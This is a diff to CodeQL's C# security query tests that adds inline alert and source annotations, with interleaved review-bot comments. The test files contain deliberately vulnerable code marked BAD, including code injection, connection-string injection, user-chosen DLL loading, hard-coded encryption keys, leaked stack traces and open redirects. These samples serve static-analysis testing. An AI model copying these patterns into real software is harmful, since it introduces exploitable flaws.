@@ -20,13 +20,13 @@ public class CommandInjectionHandler : IHttpHandler { public void ProcessRequest(HttpContext ctx) { - string code = ctx.Request.QueryString["code"]; + string code = ctx.Request.QueryString["code"]; // $ Source[cs/code-injection]=r1 $ Source[cs/code-injection]=r2 CSharpCodeProvider c = new CSharpCodeProvider(); ICodeCompiler icc = c.CreateCompiler(); CompilerParameters cp = new CompilerParameters(); // BAD: Compiling unvalidated code from the user - CompilerResults cr = icc.CompileAssemblyFromSource(cp, code); + CompilerResults cr = icc.CompileAssemblyFromSource(cp, code); // $ Alert[cs/code-injection]=r1 System.Reflection.Assembly a = cr.CompiledAssembly; object o = a.CreateInstance("MyNamespace.MyClass"); @@ -37,7 +37,7 @@ public void ProcessRequest(HttpContext ctx) object s = mi.Invoke(o, null); // BAD: Use the Roslyn APIs to dynamically evaluate C# - CSharpScript.EvaluateAsync(code); + CSharpScript.EvaluateAsync(code); // $ Alert[cs/code-injection]=r2 } public bool IsReusable @@ -53,6 +53,6 @@ public bool IsReusable void OnButtonClicked() { // BAD: Use the Roslyn APIs to dynamically evaluate C# - CSharpScript.EvaluateAsync(box1.Text); + CSharpScript.EvaluateAsync(box1.Text); // $ Alert[cs/code-injection]=r3 $ Alert[cs/code-injection]=r3 } } diff --git a/csharp/ql/test/query-tests/Security Features/CWE-094/CodeInjection.qlref b/csharp/ql/test/query-tests/Security Features/CWE-094/CodeInjection.qlref index 80eedc1b4c7c..53389dffbe49 100644 --- a/csharp/ql/test/query-tests/Security Features/CWE-094/CodeInjection.qlref +++ b/csharp/ql/test/query-tests/Security Features/CWE-094/CodeInjection.qlref @@ -1,2 +1,4 @@ query: Security Features/CWE-094/CodeInjection.ql -postprocess: utils/test/PrettyPrintModels.ql +postprocess: + - utils/test/PrettyPrintModels.ql + - utils/test/InlineExpectationsTestQuery.ql 
diff --git a/csharp/ql/test/query-tests/Security Features/CWE-099/ResourceInjection.cs b/csharp/ql/test/query-tests/Security Features/CWE-099/ResourceInjection.cs index aed9219090a7..dc7666744383 100644 --- a/csharp/ql/test/query-tests/Security Features/CWE-099/ResourceInjection.cs +++ b/csharp/ql/test/query-tests/Security Features/CWE-099/ResourceInjection.cs @@ -5,12 +5,12 @@ public class ResourceInjectionHandler : IHttpHandler { public void ProcessRequest(HttpContext ctx) { - string userName = ctx.Request.QueryString["userName"]; + string userName = ctx.Request.QueryString["userName"]; // $ Source[cs/resource-injection]=r1 $ Source[cs/resource-injection]=r2 string connectionString = "server=(local);user id=" + userName + ";password= pass;"; // BAD: Direct use of user input in a connection string for the constructor - SqlConnection sqlConnection = new SqlConnection(connectionString); + SqlConnection sqlConnection = new SqlConnection(connectionString); // $ Alert[cs/resource-injection]=r1 // BAD: Direct use of user input assigned to a connection string property - sqlConnection.ConnectionString = connectionString; + sqlConnection.ConnectionString = connectionString; // $ Alert[cs/resource-injection]=r2 // GOOD: Use SqlConnectionStringBuilder SqlConnectionStringBuilder builder = new SqlConnectionStringBuilder(); builder["Data Source"] = "(local)"; diff --git a/csharp/ql/test/query-tests/Security Features/CWE-099/ResourceInjection.qlref b/csharp/ql/test/query-tests/Security Features/CWE-099/ResourceInjection.qlref index 5292de5ee84f..e2e487631687 100644 --- a/csharp/ql/test/query-tests/Security Features/CWE-099/ResourceInjection.qlref +++ b/csharp/ql/test/query-tests/Security Features/CWE-099/ResourceInjection.qlref @@ -1,2 +1,4 @@ query: Security Features/CWE-099/ResourceInjection.ql -postprocess: utils/test/PrettyPrintModels.ql +postprocess: + - utils/test/PrettyPrintModels.ql + - utils/test/InlineExpectationsTestQuery.ql 
diff --git a/csharp/ql/test/query-tests/Security Features/CWE-112/MissingXMLValidation.cs b/csharp/ql/test/query-tests/Security Features/CWE-112/MissingXMLValidation.cs index 4ca87924c687..869b0731351f 100644 --- a/csharp/ql/test/query-tests/Security Features/CWE-112/MissingXMLValidation.cs +++ b/csharp/ql/test/query-tests/Security Features/CWE-112/MissingXMLValidation.cs 
@@ -9,22 +9,22 @@ public class MissingXMLValidationHandler : IHttpHandler public void ProcessRequest(HttpContext ctx) { - String userProvidedXml = ctx.Request.QueryString["userProvidedXml"]; + String userProvidedXml = ctx.Request.QueryString["userProvidedXml"]; // $ Source[cs/xml/missing-validation]=r1 $ Source[cs/xml/missing-validation]=r2 $ Source[cs/xml/missing-validation]=r3 $ Source[cs/xml/missing-validation]=r4 $ Source[cs/xml/missing-validation]=r5 // BAD: User provided XML is processed without any validation, // because there is no settings instance configured. - XmlReader.Create(new StringReader(userProvidedXml)); + XmlReader.Create(new StringReader(userProvidedXml)); // $ Alert[cs/xml/missing-validation]=r1 // BAD: User provided XML is processed without any validation, // because the settings instance does not specify the ValidationType XmlReaderSettings badSettings1 = new XmlReaderSettings(); - XmlReader.Create(new StringReader(userProvidedXml), badSettings1); + XmlReader.Create(new StringReader(userProvidedXml), badSettings1); // $ Alert[cs/xml/missing-validation]=r2 // BAD: User provided XML is processed without any validation, // because the settings instance specifies DTD as the ValidationType XmlReaderSettings badSettings2 = new XmlReaderSettings(); badSettings2.ValidationType = ValidationType.DTD; - XmlReader.Create(new StringReader(userProvidedXml), badSettings2); + XmlReader.Create(new StringReader(userProvidedXml), badSettings2); // $ Alert[cs/xml/missing-validation]=r3 // GOOD: User provided XML is processed with validation XmlReaderSettings goodSettings = new XmlReaderSettings(); 
@@ -42,7 +42,7 @@ public void ProcessRequest(HttpContext ctx) XmlSchemaSet sc2 = new XmlSchemaSet(); sc2.Add("urn:my-schema", "my.xsd"); goodSettings.Schemas = sc2; - XmlReader.Create(new StringReader(userProvidedXml), badSettings3); + XmlReader.Create(new StringReader(userProvidedXml), badSettings3); // $ Alert[cs/xml/missing-validation]=r4 $ Alert[cs/xml/missing-validation]=r5 } public bool IsReusable diff --git a/csharp/ql/test/query-tests/Security Features/CWE-112/MissingXMLValidation.qlref b/csharp/ql/test/query-tests/Security Features/CWE-112/MissingXMLValidation.qlref index 6f71112a01c1..3f8c9fe16878 100644 --- a/csharp/ql/test/query-tests/Security Features/CWE-112/MissingXMLValidation.qlref +++ b/csharp/ql/test/query-tests/Security Features/CWE-112/MissingXMLValidation.qlref @@ -1,2 +1,4 @@ query: Security Features/CWE-112/MissingXMLValidation.ql -postprocess: utils/test/PrettyPrintModels.ql +postprocess: + - utils/test/PrettyPrintModels.ql + - utils/test/InlineExpectationsTestQuery.ql diff --git a/csharp/ql/test/query-tests/Security Features/CWE-114/AssemblyPathInjection/AssemblyPathInjection.qlref b/csharp/ql/test/query-tests/Security Features/CWE-114/AssemblyPathInjection/AssemblyPathInjection.qlref index 5979609654f9..f789023c52dc 100644 --- a/csharp/ql/test/query-tests/Security Features/CWE-114/AssemblyPathInjection/AssemblyPathInjection.qlref +++ b/csharp/ql/test/query-tests/Security Features/CWE-114/AssemblyPathInjection/AssemblyPathInjection.qlref @@ -1,2 +1,4 @@ query: Security Features/CWE-114/AssemblyPathInjection.ql -postprocess: utils/test/PrettyPrintModels.ql +postprocess: + - utils/test/PrettyPrintModels.ql + - utils/test/InlineExpectationsTestQuery.ql diff --git a/csharp/ql/test/query-tests/Security Features/CWE-114/AssemblyPathInjection/Test.cs b/csharp/ql/test/query-tests/Security Features/CWE-114/AssemblyPathInjection/Test.cs index e0217a6d4866..8adba3f0dc84 100644 
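Review bot: The `badSettings3` call in the `@@ -42,7 +42,7 @@` hunk now expects two results, `r4` and `r5`, from the same `userProvidedXml` source, and nothing in the hunk says why one sink is reported twice. The earlier sinks in this file each sit under a `// BAD:` comment that gives the reason validation is missing. A one-line comment here naming the two conditions on `badSettings3` that the query reports would let a reader check the expectation without running the test. ProcessRequest starts outside this hunk, so a comment above the visible context may already cover part of this.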
--- a/csharp/ql/test/query-tests/Security Features/CWE-114/AssemblyPathInjection/Test.cs +++ b/csharp/ql/test/query-tests/Security Features/CWE-114/AssemblyPathInjection/Test.cs @@ -4,10 +4,10 @@ public class DLLInjectionHandler : IHttpHandler { public void ProcessRequest(HttpContext ctx) { - string libraryName = ctx.Request.QueryString["libraryName"]; + string libraryName = ctx.Request.QueryString["libraryName"]; // $ Source[cs/assembly-path-injection]=r1 // BAD: Load DLL based on user input - var badDLL = Assembly.LoadFile(libraryName); + var badDLL = Assembly.LoadFile(libraryName); // $ Alert[cs/assembly-path-injection]=r1 // GOOD: Load DLL using fixed string var goodDLL = Assembly.LoadFile(@"C:\visual studio 2012\Projects\ConsoleApplication1\ConsoleApplication1\DLL.dll"); diff --git a/csharp/ql/test/query-tests/Security Features/CWE-201/ExposureInTransmittedData/ExposureInTransmittedData.cs b/csharp/ql/test/query-tests/Security Features/CWE-201/ExposureInTransmittedData/ExposureInTransmittedData.cs index e993bc368ae7..387c9959df59 100644 --- a/csharp/ql/test/query-tests/Security Features/CWE-201/ExposureInTransmittedData/ExposureInTransmittedData.cs +++ b/csharp/ql/test/query-tests/Security Features/CWE-201/ExposureInTransmittedData/ExposureInTransmittedData.cs 
@@ -11,26 +11,26 @@ public void ProcessRequest(HttpContext ctx) try { var password = "123456"; - ctx.Response.Write(password); // BAD + ctx.Response.Write(password); // BAD // $ Alert[cs/sensitive-data-transmission]=r1 $ Alert[cs/sensitive-data-transmission]=r1 } catch (System.Data.SqlClient.SqlException ex) { - ctx.Response.Write(ex.ToString()); // BAD + ctx.Response.Write(ex.ToString()); // BAD // $ Alert[cs/sensitive-data-transmission]=r2 $ Alert[cs/sensitive-data-transmission]=r2 } catch (DbException ex) { - ctx.Response.Write(ex.Message); // BAD - ctx.Response.Write(ex.ToString()); // BAD - ctx.Response.Write(ex.Data["password"]); // BAD + ctx.Response.Write(ex.Message); // BAD // $ Alert[cs/sensitive-data-transmission]=r3 $ Alert[cs/sensitive-data-transmission]=r3 + ctx.Response.Write(ex.ToString()); // BAD // $ Alert[cs/sensitive-data-transmission]=r4 $ Alert[cs/sensitive-data-transmission]=r4 + ctx.Response.Write(ex.Data["password"]); // BAD // $ Alert[cs/sensitive-data-transmission]=r5 $ Alert[cs/sensitive-data-transmission]=r5 } } void SendPasswordToEmail() { - var p = GetField("password"); // p is now tainted - var message = new MailMessage("from", "to", p, p); // BAD - message.Body = "This is your password: " + p; // BAD - message.Subject = p; // BAD + var p = GetField("password"); // p is now tainted // $ Source[cs/sensitive-data-transmission]=r6 $ Source[cs/sensitive-data-transmission]=r7 $ Source[cs/sensitive-data-transmission]=r8 $ Source[cs/sensitive-data-transmission]=r9 + var message = new MailMessage("from", "to", p, p); // BAD // $ Alert[cs/sensitive-data-transmission]=r6 $ Alert[cs/sensitive-data-transmission]=r7 + message.Body = "This is your password: " + p; // BAD // $ Alert[cs/sensitive-data-transmission]=r8 + message.Subject = p; // BAD // $ Alert[cs/sensitive-data-transmission]=r9 } string GetField(string field) 
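Review bot: The expectations on the `// BAD` lines are appended inside the existing comment, as in `ctx.Response.Write(password); // BAD // $ Alert[...]=r1 ...`, so the comment text starts with `BAD` rather than `$`. As far as I know the inline-expectations parser only treats a comment as an expectation when `$` is its first non-whitespace character, and reads anything after a later `//` as ordinary text. If that still holds, these annotations would not be matched against the query results, so it is worth confirming. Putting the marker first, `ctx.Response.Write(password); // $ Alert[cs/sensitive-data-transmission] // BAD`, avoids the question. The same shape is on `// p is now tainted // $ Source...` in this hunk and on the `textBox.Text` lines in the `@@ -36,15 +36,15 @@` hunk of ExceptionInformationExposure.cs.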
diff --git a/csharp/ql/test/query-tests/Security Features/CWE-201/ExposureInTransmittedData/ExposureInTransmittedData.qlref b/csharp/ql/test/query-tests/Security Features/CWE-201/ExposureInTransmittedData/ExposureInTransmittedData.qlref index 9ce9ee5643ef..0c2eb8d2b2cc 100644 --- a/csharp/ql/test/query-tests/Security Features/CWE-201/ExposureInTransmittedData/ExposureInTransmittedData.qlref +++ b/csharp/ql/test/query-tests/Security Features/CWE-201/ExposureInTransmittedData/ExposureInTransmittedData.qlref @@ -1,2 +1,4 @@ query: Security Features/CWE-201/ExposureInTransmittedData.ql -postprocess: utils/test/PrettyPrintModels.ql +postprocess: + - utils/test/PrettyPrintModels.ql + - utils/test/InlineExpectationsTestQuery.ql diff --git a/csharp/ql/test/query-tests/Security Features/CWE-209/ExceptionInformationExposure.cs b/csharp/ql/test/query-tests/Security Features/CWE-209/ExceptionInformationExposure.cs index 74b3fc4dd4d0..c9dc15fcce87 100644 --- a/csharp/ql/test/query-tests/Security Features/CWE-209/ExceptionInformationExposure.cs +++ b/csharp/ql/test/query-tests/Security Features/CWE-209/ExceptionInformationExposure.cs 
@@ -16,11 +16,11 @@ public void ProcessRequest(HttpContext ctx) catch (Exception ex) { // BAD: printing a stack trace back to the response - ctx.Response.Write(ex.ToString()); + ctx.Response.Write(ex.ToString()); // $ Alert[cs/information-exposure-through-exception]=r1 $ Alert[cs/information-exposure-through-exception]=r1 // BAD: implicitly printing a stack trace back to the response - ctx.Response.Write(ex); + ctx.Response.Write(ex); // $ Alert[cs/information-exposure-through-exception]=r2 $ Alert[cs/information-exposure-through-exception]=r2 // BAD: writing StackTrace property to response - ctx.Response.Write(ex.StackTrace); + ctx.Response.Write(ex.StackTrace); // $ Alert[cs/information-exposure-through-exception]=r3 $ Alert[cs/information-exposure-through-exception]=r3 // GOOD: writing Message property to response ctx.Response.Write(ex.Message); return; @@ -36,15 +36,15 @@ public void ProcessRequest(HttpContext ctx) log("Exception occurred", ex); ctx.Response.Write("Exception occurred"); - textBox.Text = ex.InnerException.StackTrace; // BAD - textBox.Text = ex.StackTrace; // BAD - textBox.Text = ex.ToString(); // BAD + textBox.Text = ex.InnerException.StackTrace; // BAD // $ Alert[cs/information-exposure-through-exception]=r4 $ Alert[cs/information-exposure-through-exception]=r4 + textBox.Text = ex.StackTrace; // BAD // $ Alert[cs/information-exposure-through-exception]=r5 $ Alert[cs/information-exposure-through-exception]=r5 + textBox.Text = ex.ToString(); // BAD // $ Alert[cs/information-exposure-through-exception]=r6 $ Alert[cs/information-exposure-through-exception]=r6 textBox.Text = ex.Message; // GOOD return; } // BAD: printing a stack trace back to the response for a custom exception - ctx.Response.Write(new MyException().ToString()); + ctx.Response.Write(new MyException().ToString()); // $ Alert[cs/information-exposure-through-exception]=r7 $ Alert[cs/information-exposure-through-exception]=r7 } class MyException : Exception 
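Review bot: Every annotated line in the `@@ -16,11 +16,11 @@` hunk repeats the same expectation twice, for example `ctx.Response.Write(ex.ToString()); // $ Alert[cs/information-exposure-through-exception]=r1 $ Alert[cs/information-exposure-through-exception]=r1`. This looks like generated output for results whose source and sink are the same location. A single `// $ Alert[cs/information-exposure-through-exception]` per line should express the same expectation and is easier to read; confirm the test still passes in that form. The doubled tag also appears in ExposureInTransmittedData.cs (r1 to r5), HardcodedSymmetricEncryptionKey.cs (r1, r2), InsecureRandomness.cs (r4), UrlRedirect.cs (r2 to r4), UrlRedirect2.cs (r1) and CWE-611/Test.cs (r1).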
diff --git a/csharp/ql/test/query-tests/Security Features/CWE-209/ExceptionInformationExposure.qlref b/csharp/ql/test/query-tests/Security Features/CWE-209/ExceptionInformationExposure.qlref index e8813fef7a81..295c9e8cc57b 100644 --- a/csharp/ql/test/query-tests/Security Features/CWE-209/ExceptionInformationExposure.qlref +++ b/csharp/ql/test/query-tests/Security Features/CWE-209/ExceptionInformationExposure.qlref @@ -1,2 +1,4 @@ query: Security Features/CWE-209/ExceptionInformationExposure.ql -postprocess: utils/test/PrettyPrintModels.ql +postprocess: + - utils/test/PrettyPrintModels.ql + - utils/test/InlineExpectationsTestQuery.ql diff --git a/csharp/ql/test/query-tests/Security Features/CWE-248/MissingASPNETGlobalErrorHandler/WebConfigOff/MissingASPNETGlobalErrorHandler.qlref b/csharp/ql/test/query-tests/Security Features/CWE-248/MissingASPNETGlobalErrorHandler/WebConfigOff/MissingASPNETGlobalErrorHandler.qlref index f496f14153c6..521ec9079e0e 100644 --- a/csharp/ql/test/query-tests/Security Features/CWE-248/MissingASPNETGlobalErrorHandler/WebConfigOff/MissingASPNETGlobalErrorHandler.qlref +++ b/csharp/ql/test/query-tests/Security Features/CWE-248/MissingASPNETGlobalErrorHandler/WebConfigOff/MissingASPNETGlobalErrorHandler.qlref @@ -1 +1,2 @@ query: Security Features/CWE-248/MissingASPNETGlobalErrorHandler.ql +postprocess: utils/test/InlineExpectationsTestQuery.ql diff --git a/csharp/ql/test/query-tests/Security Features/CWE-248/MissingASPNETGlobalErrorHandler/WebConfigOff/Web.config b/csharp/ql/test/query-tests/Security Features/CWE-248/MissingASPNETGlobalErrorHandler/WebConfigOff/Web.config index 768c965080c1..d04829109d33 100644 --- a/csharp/ql/test/query-tests/Security Features/CWE-248/MissingASPNETGlobalErrorHandler/WebConfigOff/Web.config +++ b/csharp/ql/test/query-tests/Security Features/CWE-248/MissingASPNETGlobalErrorHandler/WebConfigOff/Web.config @@ -2,6 +2,6 @@ - + 
diff --git a/csharp/ql/test/query-tests/Security Features/CWE-321/HardcodedSymmetricEncryptionKey/HardcodedSymmetricEncryptionKey.cs b/csharp/ql/test/query-tests/Security Features/CWE-321/HardcodedSymmetricEncryptionKey/HardcodedSymmetricEncryptionKey.cs index 0c9c58d0d230..ff8600b85a81 100644 --- a/csharp/ql/test/query-tests/Security Features/CWE-321/HardcodedSymmetricEncryptionKey/HardcodedSymmetricEncryptionKey.cs +++ b/csharp/ql/test/query-tests/Security Features/CWE-321/HardcodedSymmetricEncryptionKey/HardcodedSymmetricEncryptionKey.cs 
@@ -14,21 +14,21 @@ static void Main(string[] args) var a = new AesCryptoServiceProvider(); // BAD: explicit key assignment, hard-coded value - a.Key = new byte[] { 00, 00, 00, 00, 00, 00, 00, 00, 00, 00, 00, 00, 00, 00, 00, 00 }; + a.Key = new byte[] { 00, 00, 00, 00, 00, 00, 00, 00, 00, 00, 00, 00, 00, 00, 00, 00 }; // $ Alert[cs/hardcoded-key]=r1 $ Alert[cs/hardcoded-key]=r1 var b = new AesCryptoServiceProvider() { // BAD: explicit key assignment, hard-coded value - Key = new byte[] { 00, 00, 00, 00, 00, 00, 00, 00, 00, 00, 00, 00, 00, 00, 00, 00 } + Key = new byte[] { 00, 00, 00, 00, 00, 00, 00, 00, 00, 00, 00, 00, 00, 00, 00, 00 } // $ Alert[cs/hardcoded-key]=r2 $ Alert[cs/hardcoded-key]=r2 }; - var c = new byte[] { 00, 00, 00, 00, 00, 00, 00, 00, 00, 00, 00, 00, 00, 00, 00, 00 }; + var c = new byte[] { 00, 00, 00, 00, 00, 00, 00, 00, 00, 00, 00, 00, 00, 00, 00, 00 }; // $ Source[cs/hardcoded-key]=r3 $ Source[cs/hardcoded-key]=r4 $ Source[cs/hardcoded-key]=r5 $ Source[cs/hardcoded-key]=r6 var d = c; - var byteArrayFromString = Encoding.UTF8.GetBytes("Hello, world: here is a very bad way to create a key"); + var byteArrayFromString = Encoding.UTF8.GetBytes("Hello, world: here is a very bad way to create a key"); // $ Source[cs/hardcoded-key]=r7 // BAD: key assignment via variable, from hard-coded value - a.Key = d; + a.Key = d; // $ Alert[cs/hardcoded-key]=r3 // GOOD (not really, but better than hard coding) a.Key = File.ReadAllBytes("secret.key"); @@ -65,7 +65,7 @@ public static string Decrypt(byte[] cipherText, byte[] password, byte[] IV) { using (MemoryStream ms = new MemoryStream()) { - using (CryptoStream cs = new CryptoStream(ms, aes.CreateDecryptor(password, IV), CryptoStreamMode.Write)) + using (CryptoStream cs = new CryptoStream(ms, aes.CreateDecryptor(password, IV), CryptoStreamMode.Write)) // $ Alert[cs/hardcoded-key]=r4 { cs.Write(cipherText, 0, cipherText.Length); } 
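Review bot: The `aes.CreateDecryptor(password, IV)` line in the `@@ -65,7 +65,7 @@` hunk gains `Alert[cs/hardcoded-key]=r4` but carries no comment saying why it is a sink. The matching `CreateEncryptor` line in `Encrypt` sits under `// BAD: flow of hardcoded key to CreateEncryptor constructor`. Adding `// BAD: flow of hardcoded key to CreateDecryptor` above the `using` would make the r4 pairing with the `var c = ...` source readable from the test file alone. Decrypt's body continues outside the hunk.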
@@ -105,7 +105,7 @@ static SymmetricAlgorithm CreateProvider(byte[] key) return new AesManaged() { // BAD: assignment from parameter - Key = key + Key = key // $ Alert[cs/hardcoded-key]=r5 }; } @@ -118,7 +118,7 @@ public static byte[] Encrypt(string plaintext, byte[] key, byte[] IV) using (MemoryStream ms = new MemoryStream()) { // BAD: flow of hardcoded key to CreateEncryptor constructor - using (CryptoStream cs = new CryptoStream(ms, aes.CreateEncryptor(key, IV), CryptoStreamMode.Write)) + using (CryptoStream cs = new CryptoStream(ms, aes.CreateEncryptor(key, IV), CryptoStreamMode.Write)) // $ Alert[cs/hardcoded-key]=r6 $ Alert[cs/hardcoded-key]=r7 { cs.Write(rawPlaintext, 0, rawPlaintext.Length); } diff --git a/csharp/ql/test/query-tests/Security Features/CWE-321/HardcodedSymmetricEncryptionKey/HardcodedSymmetricEncryptionKey.qlref b/csharp/ql/test/query-tests/Security Features/CWE-321/HardcodedSymmetricEncryptionKey/HardcodedSymmetricEncryptionKey.qlref index 5ec9c0d849c1..6006de2bd61b 100644 --- a/csharp/ql/test/query-tests/Security Features/CWE-321/HardcodedSymmetricEncryptionKey/HardcodedSymmetricEncryptionKey.qlref +++ b/csharp/ql/test/query-tests/Security Features/CWE-321/HardcodedSymmetricEncryptionKey/HardcodedSymmetricEncryptionKey.qlref @@ -1,2 +1,4 @@ query: Security Features/CWE-321/HardcodedEncryptionKey.ql -postprocess: utils/test/PrettyPrintModels.ql +postprocess: + - utils/test/PrettyPrintModels.ql + - utils/test/InlineExpectationsTestQuery.ql diff --git a/csharp/ql/test/query-tests/Security Features/CWE-338/InsecureRandomness.cs b/csharp/ql/test/query-tests/Security Features/CWE-338/InsecureRandomness.cs index 58241499c66b..93edb1e318ec 100644 --- a/csharp/ql/test/query-tests/Security Features/CWE-338/InsecureRandomness.cs +++ b/csharp/ql/test/query-tests/Security Features/CWE-338/InsecureRandomness.cs 
@@ -9,9 +9,9 @@ public class InsecureRandomness public void RandomTest() { // BAD: Using insecure RNG to generate password - string password = InsecureRandomString(10); - password = InsecureRandomStringFromSelection(10); - password = InsecureRandomStringFromIndexer(10); + string password = InsecureRandomString(10); // $ Alert[cs/insecure-randomness]=r1 + password = InsecureRandomStringFromSelection(10); // $ Alert[cs/insecure-randomness]=r2 + password = InsecureRandomStringFromIndexer(10); // $ Alert[cs/insecure-randomness]=r3 // IGNORE - do not track further than the first assignment to a tainted variable string passwd = password; // GOOD: Use cryptographically secure RNG @@ -25,7 +25,7 @@ public static string InsecureRandomString(int length) byte[] data = new byte[1]; while (result.Length < length) { - data[0] = (byte)r.Next(97, 122); + data[0] = (byte)r.Next(97, 122); // $ Source[cs/insecure-randomness]=r1 result.Append(new ASCIIEncoding().GetString(data)); } return result.ToString(); @@ -57,7 +57,7 @@ public static string InsecureRandomStringFromSelection(int length) Random r = new Random(); while (result.Length < length) { - result += letters[r.Next(3)]; + result += letters[r.Next(3)]; // $ Source[cs/insecure-randomness]=r2 } return result.ToString(); } @@ -69,7 +69,7 @@ public static string InsecureRandomStringFromIndexer(int length) Random r = new Random(); while (result.Length < length) { - result += letters[r.Next(3)]; + result += letters[r.Next(3)]; // $ Source[cs/insecure-randomness]=r3 } return result; } @@ -77,7 +77,7 @@ public static string InsecureRandomStringFromIndexer(int length) public static string BiasPasswordGeneration() { // BAD: Membership.GeneratePassword generates a password with a bias - string password = System.Web.Security.Membership.GeneratePassword(12, 3); + string password = System.Web.Security.Membership.GeneratePassword(12, 3); // $ Alert[cs/insecure-randomness]=r4 $ Alert[cs/insecure-randomness]=r4 return password; } 
diff --git a/csharp/ql/test/query-tests/Security Features/CWE-338/InsecureRandomness.qlref b/csharp/ql/test/query-tests/Security Features/CWE-338/InsecureRandomness.qlref index b2198beb2b45..a79d744ce61c 100644 --- a/csharp/ql/test/query-tests/Security Features/CWE-338/InsecureRandomness.qlref +++ b/csharp/ql/test/query-tests/Security Features/CWE-338/InsecureRandomness.qlref @@ -1,2 +1,4 @@ query: Security Features/InsecureRandomness.ql -postprocess: utils/test/PrettyPrintModels.ql +postprocess: + - utils/test/PrettyPrintModels.ql + - utils/test/InlineExpectationsTestQuery.ql diff --git a/csharp/ql/test/query-tests/Security Features/CWE-352/missing-aspnetcore/MissingAntiForgeryTokenValidation.cs b/csharp/ql/test/query-tests/Security Features/CWE-352/missing-aspnetcore/MissingAntiForgeryTokenValidation.cs index e9e5202b40ab..2b9f3974234c 100644 --- a/csharp/ql/test/query-tests/Security Features/CWE-352/missing-aspnetcore/MissingAntiForgeryTokenValidation.cs +++ b/csharp/ql/test/query-tests/Security Features/CWE-352/missing-aspnetcore/MissingAntiForgeryTokenValidation.cs @@ -4,7 +4,7 @@ public class HomeController : Controller { // BAD: Anti forgery token has been forgotten [HttpPost] - public ActionResult Login() + public ActionResult Login() // $ Alert[cs/web/missing-token-validation] { return View(); } @@ -55,7 +55,7 @@ public class DerivedUnprotectedController : UnprotectedBaseController { // BAD: No antiforgery validation on this or any base class [HttpPost] - public ActionResult NoInheritedValidation() + public ActionResult NoInheritedValidation() // $ Alert[cs/web/missing-token-validation] { return View(); } diff --git a/csharp/ql/test/query-tests/Security Features/CWE-352/missing-aspnetcore/MissingAntiForgeryTokenValidation.qlref b/csharp/ql/test/query-tests/Security Features/CWE-352/missing-aspnetcore/MissingAntiForgeryTokenValidation.qlref index 5e1ab2426c65..8948b9773a2d 100644 
--- a/csharp/ql/test/query-tests/Security Features/CWE-352/missing-aspnetcore/MissingAntiForgeryTokenValidation.qlref +++ b/csharp/ql/test/query-tests/Security Features/CWE-352/missing-aspnetcore/MissingAntiForgeryTokenValidation.qlref @@ -1 +1,2 @@ query: Security Features/CWE-352/MissingAntiForgeryTokenValidation.ql +postprocess: utils/test/InlineExpectationsTestQuery.ql diff --git a/csharp/ql/test/query-tests/Security Features/CWE-451/MissingXFrameOptions/NoHeader/MissingXFrameOptions.qlref b/csharp/ql/test/query-tests/Security Features/CWE-451/MissingXFrameOptions/NoHeader/MissingXFrameOptions.qlref index 5a653b7ada09..d0d38c4b0117 100644 --- a/csharp/ql/test/query-tests/Security Features/CWE-451/MissingXFrameOptions/NoHeader/MissingXFrameOptions.qlref +++ b/csharp/ql/test/query-tests/Security Features/CWE-451/MissingXFrameOptions/NoHeader/MissingXFrameOptions.qlref @@ -1 +1,2 @@ query: Security Features/CWE-451/MissingXFrameOptions.ql +postprocess: utils/test/InlineExpectationsTestQuery.ql diff --git a/csharp/ql/test/query-tests/Security Features/CWE-451/MissingXFrameOptions/NoHeader/Web.config b/csharp/ql/test/query-tests/Security Features/CWE-451/MissingXFrameOptions/NoHeader/Web.config index 8f0b996a0244..66a19f0635a5 100644 --- a/csharp/ql/test/query-tests/Security Features/CWE-451/MissingXFrameOptions/NoHeader/Web.config +++ b/csharp/ql/test/query-tests/Security Features/CWE-451/MissingXFrameOptions/NoHeader/Web.config @@ -2,4 +2,4 @@ - + diff --git a/csharp/ql/test/query-tests/Security Features/CWE-548/ASPNetDirectoryListing.qlref b/csharp/ql/test/query-tests/Security Features/CWE-548/ASPNetDirectoryListing.qlref index 95e9bc80fe7f..c792e1fcbe42 100644 --- a/csharp/ql/test/query-tests/Security Features/CWE-548/ASPNetDirectoryListing.qlref +++ b/csharp/ql/test/query-tests/Security Features/CWE-548/ASPNetDirectoryListing.qlref @@ -1 +1,2 @@ query: Security Features/CWE-548/ASPNetDirectoryListing.ql +postprocess: utils/test/InlineExpectationsTestQuery.ql 
diff --git a/csharp/ql/test/query-tests/Security Features/CWE-548/web.config b/csharp/ql/test/query-tests/Security Features/CWE-548/web.config index b4276433838e..0631d8116609 100644 --- a/csharp/ql/test/query-tests/Security Features/CWE-548/web.config +++ b/csharp/ql/test/query-tests/Security Features/CWE-548/web.config @@ -1,6 +1,6 @@ - + diff --git a/csharp/ql/test/query-tests/Security Features/CWE-601/UrlRedirect/UrlRedirect.cs b/csharp/ql/test/query-tests/Security Features/CWE-601/UrlRedirect/UrlRedirect.cs index 3b3aae534adb..673502b960e1 100644 --- a/csharp/ql/test/query-tests/Security Features/CWE-601/UrlRedirect/UrlRedirect.cs +++ b/csharp/ql/test/query-tests/Security Features/CWE-601/UrlRedirect/UrlRedirect.cs @@ -10,7 +10,7 @@ public class UrlRedirectHandler : IHttpHandler public void ProcessRequest(HttpContext ctx) { // BAD: a request parameter is incorporated without validation into a URL redirect - ctx.Response.Redirect(ctx.Request.QueryString["page"]); + ctx.Response.Redirect(ctx.Request.QueryString["page"]); // $ Alert[cs/web/unvalidated-url-redirection]=r2 $ Alert[cs/web/unvalidated-url-redirection]=r2 // GOOD: the request parameter is validated against a known fixed string if (VALID_REDIRECT == ctx.Request.QueryString["page"]) @@ -20,7 +20,7 @@ public void ProcessRequest(HttpContext ctx) // GOOD: We check whether this is a local URL before redirecting, using UrlHelper. // As recommended by https://docs.microsoft.com/en-us/aspnet/mvc/overview/security/preventing-open-redirection-attacks - string url = ctx.Request.QueryString["page"]; + string url = ctx.Request.QueryString["page"]; // $ Source[cs/web/unvalidated-url-redirection]=r5 $ Source[cs/web/unvalidated-url-redirection]=r6 $ Source[cs/web/unvalidated-url-redirection]=r7 $ Source[cs/web/unvalidated-url-redirection]=r8 if (new UrlHelper(null).IsLocalUrl(url)) { ctx.Response.Redirect(url); 
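Review bot: In the `@@ -20,7 +20,7 @@` hunk of UrlRedirect.cs the `Source[...]=r5` to `=r8` annotation lands on `string url = ctx.Request.QueryString["page"];`, directly under the `// GOOD: We check whether this is a local URL before redirecting` comment, so the line reads as if the validated redirect were the flagged case. The matching alerts are in later hunks, on `ctx.Server.Transfer(url)` and the `Redirect` calls that place `url` in the location position. A short comment above the declaration, such as `// url is also reused, unvalidated, by the BAD cases below (r5-r8)`, would make the pairing clear. ProcessRequest continues outside this hunk.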
